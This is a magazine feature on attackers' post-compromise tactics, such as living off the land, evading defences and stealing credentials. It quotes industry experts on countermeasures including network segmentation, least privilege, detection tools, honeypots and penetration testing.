When a cybercriminal compromises your network they often do not strike immediately. There is a vast amount of activity undertaken by threat actors between initial compromise and impact.
This presents a critical window of opportunity for cybersecurity professionals and it is vital to identify and neutralize these hidden threats before they attack.
Initial compromise is one of the easiest parts of a cyber-attack for cybercriminals. Specialist initial access brokers now have ways to infiltrate organizations on mass, especially via vulnerability exploitation of widely used software products.
This has led to threat actors developing a sophisticated arsenal of post-compromise techniques and tools to maximize the impact of their attacks once inside victim networks.
It is vital organizations focus on this aspect of their defenses, alongside preventing initial access.
What Post-Compromise Activity Looks Like
Post-compromise activity refers to the tactics, techniques and procedures (TTPs) used by threat actors after gaining access to the target network.
The goal of this process is to gain a foothold in the network, move laterally without being detected and access the most valuable data and systems.
Speaking to Infosecurity, Holly Grace Williams, Managing Director at Akimbo Core, explained that her three main goals while conducting penetration tests on client organizations are to:
- Retain Access (Persistence)
- Enhance Access (Privilege Escalation)
- Increase Access (Propagation/Lateral Movement)
“Once we’ve put the work in to know that our connection is solid and that we’ve gained all the access that we can – then we look to demonstrate impact,” she commented.
These approaches are important for both nation-state and financially motivated threat actors. Nation-state actors are often focused on espionage activities meaning the more time spent on a network to uncover where sensitive data is held, the better.
Dr Jamie Collier, Senior Threat Intelligence Advisor at Mandiant, explained: “State espionage groups are far more persistent and focused on long-term collection targets.”
Financially motivated attackers also conduct extensive post-compromise activity, primarily to discover and exfiltrate the most valuable data. This includes ransomware attackers, who traditionally encrypt files as quickly as possible. Recently, the threat of publishing data has become the primary method of extorting victims, necessitating time and resources to discover and exfiltrate sensitive data on target networks.
Martin Zugec, Technical Solutions Director at Bitdefender, noted: “Ransomware attackers focus on two things: expanding their access and staying hidden.”
Post-Compromise Techniques
Attackers’ Living-off-the-Land
Attackers can operate in victim networks undisturbed by avoiding detection and evading defensive tools. This is commonly achieved by leveraging legimitate tools inside the victim’s network, a concept known as ‘living-off-the-land’.
Zugec noted that while powerful hacking frameworks, such as Metasploit, are available to threat actors, they have found that “subtler” methods that don’t rely on easily detectable files are more effective for stealthy attacks.
This has resulted in the growing exploitation of legitimate tools such as PowerShell. SonicWall’s 2024 Mid-Year Cyber Threat Report found that PowerShell – a legitimate Windows automation tool used by developers – is now exploited by over 90% of malware families. The exploitation of legitimate network tools in this way
Erhan Temurkan, Director of Security and Technology at Fleet Mortgages, told Infosecurity: “In essence, they’re trying to make it look like genuine user activity. They are the same tools administrators will use every day. They’re not tools you can block because IT teams are using those to monitor and manage your systems.”
Disabling Defensive Capabilities
Many threat actors use malware that contain obfuscation, defense evasion and lateral movement capabilities.
A 2024 Cisco Talos report highlighted how the most prominent ransomware groups focus on defense evasion, including disabling and modifying security software such as anti-virus programs, and obfuscating malicious software by packing and compressing the code.
A variety of novel techniques have been observed in recent years to enable such approaches. For example, HP Wolf researchers reported in August 2023 that QakBot malware campaigns are switching up different file types and techniques to bypass detection tools and security policies.
Collier noted: “Threat actors typically rely on legitimate remote access tools as well as a variety of tunneler and proxy malware to maintain their presence in victim networks.
“Threat actors typically rely on legitimate remote access tools as well as a variety of tunneler and proxy malware to maintain their presence in victim networks"
Credential Theft and Privilege Escalation
Threat actors place a significant emphasis on accessing legitimate user credentials that they can leverage once inside a network for lateral movement, particularly if they are of privileged users, such as administrators.
“Obtaining valid credentials remains a highly effective approach for actors looking to escalate privileges, making it essential for organizations to look out for a variety of credential stealers being used,” explained Collier.
Strategies for Post-Compromise Defense
Threat actors’ rising post-compromise capabilities is a major source of concern. However, their longer dwell time in networks offers opportunities for defenders to disrupt attacks, preventing damaging incidents occurring.
Williams advised: “Don’t think of attacks as a single activity, or a single action, but a series of stages the attack moves through and aim to disrupt them at every one.”
Given the vast scale of attacks, including of software supply, it is vital organizations recognize that attackers are highly likely infiltrate their systems at some stage and that they plan accordingly.
Collier noted: “The increase in exploitation makes it essential for defenders to adopt a security posture where initial access is already assumed. By inserting security controls that address common post-compromise activity, organizations introduce multiple hurdles for extortion groups targeting their network.”
There are a vast range of actions organizations can take to disrupt attackers in their network and prevent them from achieving their aims.
Network Segmentation
Strict network segmentation makes lateral movement very difficult for threat actors. However, Williams noted that in her work as a penetration tester she rarely sees this implemented effectively.
“Decent network segmentation is rare to see, no doubt because it’s time consuming to implement and requires a different way of working for IT Teams, but it works very well when it’s done correctly,” noted Williams.
Richard Hughes, Vice President Technology, Information Security & Data at biotech firm Bicycle Therapeutics, explained his organization’s approach to segmentation as “aggressive and immediate.”
“If an unauthorized engineer or device attempts to access our network, their machine is immediately shut down at the source. We don't allow any lateral movement within our network, and even initial scans of our environment are blocked at the source. This rapid response capability is crucial in preventing potential threats from gaining a foothold in our systems,” Hughes told Infosecurity.
Access Controls and Least Privilege
Strong access controls are essential to prevent attackers from using stolen credentials to help them move through networks without detection, particularly for privileged users such as administrators.
Williams advised that organizations limit the number of administrator accounts to as few as possible and only allow these accounts to be used for administrator activities. Additionally, service accounts should be minimized and have stricter policies in place.
"The increase in exploitation makes it essential for defenders to adopt a security posture where initial access is already assumed"
This is an approach endorsed by Hughes: “Regular user machines do not have admin access, and we maintain a limited number of admin accounts for our IT staff. This significantly reduces the potential attack surface and is intended to limit the impact of any potential compromise.”
Monitoring and Detection Tools
Endpoint detection and response (EDR) and managed detection and response (MDR) tools have seen significant advancements in recent years.
These solutions are designed to detect and tackle threats that evade traditional security tools, minimizing attacker dwell time in networks. This includes leveraging proactive threat hunting.
Bitdefender’s Zugec emphasized that simply having these tools in place is not sufficient. The first challenge is ensuring they are accessible and effective for companies of all sizes.
Additionally, they require humans to be actively monitoring them, be-it internally or externally.
Obfuscation and Decoys
Organizations can leverage a range of techniques to make it harder for attackers to locate and access the most sensitive data and systems in a network. One approach is to encrypt, mask and tokenize sensitive data.
Temurkan also highlighted the effectiveness of deploying honeypots and decoys in the network - essentially mimicking a high-value target to lure attackers into targeting it.
These fake targets can then be actively monitored, and attackers’ techniques analyzed without any damage being caused.
Temurkan explained: “Attackers will think they’ve hit your crown jewels but it’s just a way to detect that activity and you isolate them in that region.”
In August 2024, the UK’s National Cyber Security Centre (NCSC) called for organizations to deploy cyber deception technologies at scale to assess their efficacy.
Penetration Testing
Regular penetration systems, conducted by skilled ethical hackers, are crucial for properly testing systems under real-world conditions, ensuring security measures are working as intended.
These exercises can also be undertaken without warning to truly test an organization’s defenses, utilizing the latest techniques used by threat actors.
This approach enables weaknesses to be identified early and addressed before a real attacker finds them and is able to travel through networks unimpeded.
Zugec said: “Turn ‘what-ifs’ into regular drills. Don't just imagine worst-case scenarios.”
Boost the Human Firewall
Employees can also help in identifying system compromise, if they are trained on simple indicators that could come up in their day-to-day work.
Temurkan gave the example of multi-factor authentication (MFA), which as well as providing an extra layer of account protection, can be utilized as a monitoring tool.
For example, if an employee receives an app based MFA notification they did not request, they should immediately report that to their IT team.
Conclusion
Attackers are becoming more adept at compromising networks, particularly through the rapid exploitation of software vulnerabilities.
However, initial access is far from the end of the journey, and modern attackers carry out substantial post-compromise activity to achieve their aims.
It is crucial that organizations place just as much emphasis – arguably more – on their post-compromise defenses, using every possible means of making life harder for attackers and ensuring their most valuable data and systems are heavily protected.
The harder attackers have to work to move laterally, the more opportunities this gives defenders to identify, and eliminate, rising cyber threats.